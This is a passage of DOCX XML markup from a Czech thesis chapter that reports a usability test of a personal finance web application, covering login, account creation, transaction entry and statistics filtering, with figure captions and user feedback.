      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003D62FC">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00B76D0C">
        <w:t xml:space="preserve"> Po jeho odeslání je aplikace automaticky přihlás</w:t>
      </w:r>
      <w:r w:rsidR="00A26798">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00B76D0C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77FCF" w:rsidRDefault="00C77FCF" w:rsidP="00C77FCF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="2618318"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="10582"/>
            <wp:docPr id="1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580380" cy="2618318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77FCF" w:rsidRDefault="00C77FCF" w:rsidP="003D62FC">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Ref386980151"/>
      <w:bookmarkStart w:id="204" w:name="_Ref386980138"/>
      <w:bookmarkStart w:id="205" w:name="_Toc387327924"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="203"/>
      <w:r>
        <w:t>. Přihlašovací obrazovka.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w:rsidR="003D62FC" w:rsidRDefault="008438F8" w:rsidP="003D62FC">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="2368625"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="12625"/>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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="2368625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D62FC" w:rsidRPr="003D62FC" w:rsidRDefault="003D62FC" w:rsidP="003D62FC">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Ref386980369"/>
      <w:bookmarkStart w:id="207" w:name="_Toc387327925"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="206"/>
      <w:r>
        <w:t>. Registrační formulář.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w:rsidR="00C77FCF" w:rsidRDefault="00B76D0C" w:rsidP="00B76D0C">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc387327893"/>
      <w:r>
        <w:t>Vytvoření účtů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w:rsidR="00B76D0C" w:rsidRDefault="005E0640" w:rsidP="00B76D0C">
      <w:r>
        <w:t xml:space="preserve">Uživatelé byly vyzváni, aby v aplikaci evidovali 7 výdajů a </w:t>
      </w:r>
      <w:r w:rsidR="00734165">
        <w:t xml:space="preserve">jeden </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">příjem, přičemž některé výdaje </w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t>platili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v hotovosti a jiné bezhotovostně z bankovního účtu. Seznam těchto pohybů financí dostali ve formě tabulky. Bylo na </w:t>
      </w:r>
      <w:r w:rsidR="000524A1">
        <w:t>rozhodnutí jednotlivých uživatelů</w:t>
      </w:r>
      <w:r>
        <w:t>, zda budou chtít evidovat hotovost a bankovní účet zvlášť nebo dohromady. Všichni zvolili možnost oddělen</w:t>
      </w:r>
      <w:r w:rsidR="00773AA0">
        <w:t>ých</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> účtů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76D0C" w:rsidRDefault="00B76D0C" w:rsidP="00B76D0C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="3639634"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="17966"/>
            <wp:docPr id="23"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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="3639634"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76D0C" w:rsidRDefault="00B76D0C" w:rsidP="00B76D0C">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Ref386981304"/>
      <w:bookmarkStart w:id="210" w:name="_Toc387327926"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="209"/>
      <w:r>
        <w:t>. Úvodní obrazovka po prvním přihlášení.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w:rsidR="005E0640" w:rsidRDefault="00782FA8" w:rsidP="005E0640">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Po přihlášení do aplikace je uživatel v případě, kdy nemá vytvořený žádný účet, přesměrován do správy účtů</w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aby si mohl účet rovnou vytvořit (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386981304 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Na této obrazovce </w:t>
      </w:r>
      <w:r w:rsidR="00773AA0">
        <w:t>uživatelé neměli problé</w:t>
      </w:r>
      <w:r w:rsidR="00C21CFA">
        <w:t>my a klik</w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t>nuli</w:t>
      </w:r>
      <w:r w:rsidR="00C21CFA">
        <w:t xml:space="preserve"> buď na tlačítko </w:t>
      </w:r>
      <w:r w:rsidR="00773AA0" w:rsidRPr="00C21CFA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nový účet</w:t>
      </w:r>
      <w:r w:rsidR="00773AA0">
        <w:t xml:space="preserve"> nebo </w:t>
      </w:r>
      <w:r w:rsidR="00773AA0" w:rsidRPr="00C21CFA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Začněte vytvořením nového účtu</w:t>
      </w:r>
      <w:r w:rsidR="00773AA0">
        <w:t xml:space="preserve">. Tím se dostali na obrazovku </w:t>
      </w:r>
      <w:r w:rsidR="00F33088">
        <w:t>pro vytvoření nového účtu (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F33088">
        <w:instrText xml:space="preserve"> REF _Ref386981850 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F33088">
        <w:t>). Na této obrazovce nebyly zaznamenány žádné nejasnosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773AA0" w:rsidRDefault="00F33088" w:rsidP="00773AA0">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="1787852"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="21898"/>
            <wp:docPr id="2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5580380" cy="1787852"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773AA0" w:rsidRDefault="00773AA0" w:rsidP="00773AA0">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Ref386981850"/>
      <w:bookmarkStart w:id="212" w:name="_Toc387327927"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="211"/>
      <w:r>
        <w:t>. Vytvoření nového účtu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w:rsidR="00AC67E4" w:rsidRDefault="009E5A67" w:rsidP="009E5A67">
      <w:r>
        <w:t xml:space="preserve">Po uložení svého prvního účtu je uživatel automaticky přesměrován do sekce </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21CFA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aby mohl </w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t>hned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> začít zadávat transakce. Vzhledem k tomu, že všichni uživatelé chtěli pro evidenci vytvořit více účtů, přišlo jim toto přesměrování nevhodné, protože čekali, že budou moci vytvořit další účet. Museli se proto vrátit zpět do sekce </w:t>
      </w:r>
      <w:r w:rsidR="00FD3123" w:rsidRPr="00C21CFA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21CFA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>práva</w:t>
      </w:r>
      <w:r>
        <w:t>, k čemuž museli použít menu v horním panelu. Většinou se zpět dostali rychle a bez potíží, ale v jednom případě uživatel strávil necelou půl minutu hledáním možnosti jak se dostat zpět do správy účtů, než si všim</w:t>
      </w:r>
      <w:r w:rsidR="007931D0">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> horního menu.</w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t xml:space="preserve"> Toto menu by tedy mohlo být více výrazné.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099778F" w:rsidRDefault="0099778F" w:rsidP="0099778F">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc387327894"/>
      <w:r>
        <w:t>Evidence transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w:rsidR="0099778F" w:rsidRDefault="00FD3123" w:rsidP="0099778F">
      <w:r>
        <w:t xml:space="preserve">Pro evidenci transakcí je nutné jít na stránku </w:t>
      </w:r>
      <w:r w:rsidRPr="00B747C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, což zvládli všichni uživatelé, protože již věděli, že k tomu mají použít horní menu. Na této stránce je možné zadávat nové a filtrovat již existující transakce a zobrazovat si k nim statistiky, jak bylo navrhnuto v kapitole </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386983859 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386983853 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>Přehled a evidence transakcí</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001130C4">
        <w:t xml:space="preserve"> Konečnou podobu této stránky je možné </w:t>
      </w:r>
      <w:r w:rsidR="0085702A">
        <w:t xml:space="preserve">vidět </w:t>
      </w:r>
      <w:r w:rsidR="001130C4">
        <w:t xml:space="preserve">na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001130C4">
        <w:instrText xml:space="preserve"> REF _Ref386983920 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001130C4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0085702A">
        <w:t xml:space="preserve">Formulář pro vytvoření nového výdaje je na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0085702A">
        <w:instrText xml:space="preserve"> REF _Ref386984271 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0085702A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085702A" w:rsidRPr="0099778F" w:rsidRDefault="00784716" w:rsidP="0099778F">
      <w:r>
        <w:t>S vytvořením transakcí neměl žádný uživatel vážné potíže, nicméně našlo se několik připomínek. Především by podle uživatelů bylo dobré podrobněji vysvětlit funkci štítků, na</w:t>
      </w:r>
      <w:r w:rsidR="0051751F">
        <w:t xml:space="preserve">příklad nápovědou přímo u pole </w:t>
      </w:r>
      <w:r w:rsidRPr="0051751F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Štítky</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> formuláře pro zadávání transakcí. Dále uživatelům na začátku nebylo jasné, </w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t>zda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> musí ve filtru transakcí vybrat nejdříve účet a až </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">poté zvolit možnost </w:t>
      </w:r>
      <w:r w:rsidRPr="0051751F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nový výdaj</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (účet se ve skutečnosti vybírá až ve formuláři pro </w:t>
      </w:r>
      <w:r w:rsidR="00AC67E4">
        <w:t xml:space="preserve">vytvoření transakce a filtr v přehledu na něj nemá </w:t>
      </w:r>
      <w:r w:rsidR="0051751F">
        <w:t xml:space="preserve">žádný </w:t>
      </w:r>
      <w:r w:rsidR="00AC67E4">
        <w:t>vliv).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754B74" w:rsidRDefault="0099778F" w:rsidP="00754B74">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="3984900"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="1560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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="3984900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754B74" w:rsidRDefault="00754B74" w:rsidP="00754B74">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Ref386983920"/>
      <w:bookmarkStart w:id="215" w:name="_Ref386983916"/>
      <w:bookmarkStart w:id="216" w:name="_Toc387327928"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="214"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FD3123">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r w:rsidR="00FD3123">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731FAE">
        <w:t xml:space="preserve">evidovaných </w:t>
      </w:r>
      <w:r w:rsidR="00FD3123">
        <w:t>transakc</w:t>
      </w:r>
      <w:r w:rsidR="001130C4">
        <w:t>í</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
      <w:r w:rsidR="001130C4">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001130C4" w:rsidRDefault="0085702A" w:rsidP="001130C4">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5582497" cy="2813941"/>
            <wp:effectExtent l="19050" t="19050" r="18203" b="24509"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5586703" cy="2816061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001130C4" w:rsidRPr="001130C4" w:rsidRDefault="001130C4" w:rsidP="001130C4">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Ref386984271"/>
      <w:bookmarkStart w:id="218" w:name="_Toc387327929"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="217"/>
      <w:r>
        <w:t>. Formulář pro vytvoření nového výdaje.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w:rsidR="00AC67E4" w:rsidRDefault="00AC67E4" w:rsidP="00AC67E4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Jeden uživatel si myslel, že když má ve filtru vybrané dva účty, tak výdaj vytvoří pro oba účty současně. Nicméně poté, co uživatelé zjistili, že je nutné vybrat účet explicitně až při vytváření výdaje, jim byl systém vytváření transakcí jasný. Při vytváření transakce by ale ocenili, kdyby jim aplikace automaticky vybrala účet, který měli zvolený ve filtru přehledu transakcí. </w:t>
      </w:r>
      <w:r w:rsidR="005378ED">
        <w:t xml:space="preserve">Jednomu uživateli chybělo pole </w:t>
      </w:r>
      <w:r w:rsidRPr="005378ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Název</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, které by využíval pro jednoduchou orientaci v transakcích, protože </w:t>
      </w:r>
      <w:r w:rsidRPr="005378ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Popis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chápal jako doplňující </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>nedůležité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> údaje, které </w:t>
      </w:r>
      <w:r w:rsidR="005378ED">
        <w:t>nebudou</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve"> zobrazeny</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005378ED">
        <w:t xml:space="preserve">přímo </w:t>
      </w:r>
      <w:r>
        <w:t>v tabulce transakcí. Naopak uživatelé uvedli, že se jim líbí možnost rychlé volby dnešního a</w:t>
      </w:r>
      <w:r w:rsidR="00CD18A3">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>včerejšího data pomocí tlačítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF253D" w:rsidRPr="0099778F" w:rsidRDefault="00EF253D" w:rsidP="00AC67E4">
      <w:r>
        <w:t>Po vyzvání k úpravě a smazání existující transakce uživatelé okamžitě kliknuli na správná tlačítka na řádku s transakcí, kterou chtěli upravit nebo smazat. Stejně tak přejmenování a odstranění existujícího štítku pro ně nepředstavovalo žádný problém.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E5A67" w:rsidRDefault="00B525C2" w:rsidP="009D62F1">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc387327895"/>
      <w:r>
        <w:t>Zobrazení s</w:t>
      </w:r>
      <w:r w:rsidR="009D62F1">
        <w:t>tatistik</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w:rsidR="00B525C2" w:rsidRDefault="00B525C2" w:rsidP="003C3898">
      <w:r>
        <w:t xml:space="preserve">Uživatelé k zobrazení statistik používali testovací účet s již připravenými daty, aby měli všichni stejné výchozí podmínky. Byly vyzváni k rozboru evidovaných výdajů za určité období. Zde vyvstalo několik nejasností, které </w:t>
      </w:r>
      <w:r w:rsidR="005D44B4">
        <w:t xml:space="preserve">budou popsány </w:t>
      </w:r>
      <w:r w:rsidR="00680D84">
        <w:t>dále</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B525C2" w:rsidRDefault="00B525C2" w:rsidP="00B525C2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc387327896"/>
      <w:r>
        <w:t>Filtrování transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w:rsidR="00B525C2" w:rsidRDefault="00DA1F11" w:rsidP="00B525C2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="1635718"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="21632"/>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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="1635718"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B525C2" w:rsidRDefault="00B525C2" w:rsidP="00B525C2">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Ref386988611"/>
      <w:bookmarkStart w:id="222" w:name="_Toc387327930"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
